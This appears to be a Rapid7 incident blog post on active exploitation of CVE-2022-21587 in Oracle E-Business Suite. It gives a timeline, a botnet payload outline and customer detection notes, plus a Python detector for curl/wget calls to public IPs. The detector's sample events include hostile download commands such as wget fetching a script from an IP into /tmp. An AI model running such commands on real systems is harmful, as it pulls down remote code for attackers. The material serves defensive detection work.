CVSS3 base score: 9.8 High

| Metric | Value |
| --- | --- |
| Attack Vector | NETWORK |
| Attack Complexity | LOW |
| Privileges Required | NONE |
| User Interaction | NONE |
| Scope | UNCHANGED |
| Confidentiality Impact | HIGH |
| Integrity Impact | HIGH |
| Availability Impact | HIGH |

Vector string: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
Emergent threats evolve quickly, and as we learn more about this vulnerability, this blog post will evolve, too.
Rapid7 is responding to various compromises arising from the exploitation of CVE-2022-21587, a critical arbitrary file upload vulnerability (rated 9.8 on the CVSS v3 risk metric) impacting Oracle E-Business Suite (EBS). Oracle published a Critical Patch Update Advisory in October 2022 which included a fix; CISA added CVE-2022-21587 to its Known Exploited Vulnerabilities (KEV) catalog on February 2, 2023.
> Oracle E-Business Suite is a packaged collection of enterprise applications for a wide variety of tasks such as customer relationship management (CRM), enterprise resource planning (ERP), and human capital management (HCM).
CVE-2022-21587 can lead to unauthenticated remote code execution.
On January 16, 2023, Viettel Security published an analysis of the issue detailing both the vulnerability's root cause and a method of leveraging the vulnerability to gain code execution. An exploit based on the Viettel Security analysis technique was published on GitHub by "HMs" on February 6, 2023.
On February 8, 2023, Rapid7 posted a technical analysis of CVE-2022-21587 on AttackerKB. Of particular note, we found that it is possible to upload arbitrary Java Server Pages (JSP) allowing for exploitation beyond the Perl web shell that has been observed so far.
The attacker(s) are using the above-mentioned proof-of-concept exploit to upload a Perl script, which fetches (via curl/wget) additional scripts that download a malicious binary payload, making the victim host part of a botnet.
InsightVM & Nexpose customers: Authenticated vulnerability checks for CVE-2022-21587 have been available since November 2022. Note that these require valid Oracle Database credentials to be configured in order to collect the relevant patch level information.
InsightIDR & Managed Detection & Response (MDR) customers: in our current investigations, the following previously existing detections have been triggering post-exploitation:

- Suspicious Process - Wget to External IP Address
- Attacker Technique - Curl or Wget To Public IP Address With Non Standard Port
We're also testing new rules more specific to Oracle E-Business Suite.
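As an added illustration of the post-exploitation behaviour these two detections key on (not Rapid7's rule logic, which is not published here), the following example classifies constructed process-creation events by whether curl/wget reaches out to a literal public IP address, and whether that address uses a port other than 80 or 443. The event format, the `INTERNAL_NETS` ranges and the sample IPs are assumptions for the example.

```python
import ipaddress
import re
from typing import List, Optional, Tuple
from urllib.parse import urlsplit

# Constructed sample process-creation events; not telemetry from the incidents described.
SAMPLE_EVENTS = [
    "proc=wget cmd='wget http://203.0.113.10:8081/x.sh -O /tmp/x.sh'",
    "proc=curl cmd='curl -s http://198.51.100.7/update.pl'",
    "proc=curl cmd='curl https://10.0.0.5:8443/internal'",
    "proc=wget cmd='wget https://updates.example.org/file.tar.gz'",
]

# Ranges treated as internal (RFC 1918, loopback, link-local); tune per environment.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                  "127.0.0.0/8", "169.254.0.0/16")]
STANDARD_PORTS = {80, 443}
CMD_RE = re.compile(r"cmd='([^']*)'")
URL_RE = re.compile(r"https?://[^\s'\"]+")

def external_ip_targets(cmdline: str) -> List[Tuple[str, Optional[int]]]:
    """Return (ip, explicit_port) for every URL whose host is a literal non-internal IP."""
    hits = []
    for url in URL_RE.findall(cmdline):
        parts = urlsplit(url)
        try:
            ip = ipaddress.ip_address(parts.hostname)
        except ValueError:
            continue  # a hostname rather than an IP literal: not in scope for these rules
        if any(ip in net for net in INTERNAL_NETS):
            continue
        hits.append((str(ip), parts.port))  # port is None when the URL omits it
    return hits

def classify(event: str) -> List[str]:
    """Map one process event to the names of the detection rules it matches."""
    proc_m, cmd_m = re.search(r"proc=(\S+)", event), CMD_RE.search(event)
    if not proc_m or not cmd_m:
        return []
    proc, targets = proc_m.group(1), external_ip_targets(cmd_m.group(1))
    alerts = []
    if proc == "wget" and targets:
        alerts.append("Suspicious Process - Wget to External IP Address")
    if proc in ("curl", "wget") and any(
            port is not None and port not in STANDARD_PORTS for _, port in targets):
        alerts.append("Attacker Technique - Curl or Wget To Public IP Address With Non Standard Port")
    return alerts

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(event, "->", classify(event) or "no alert")
```

Only the first sample trips both rules; a download from a public IP on a standard port by curl, or from an internal host, matches neither, which is the gap the Oracle EBS-specific rules mentioned above are meant to close.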
February 8, 2023 18:15 UTC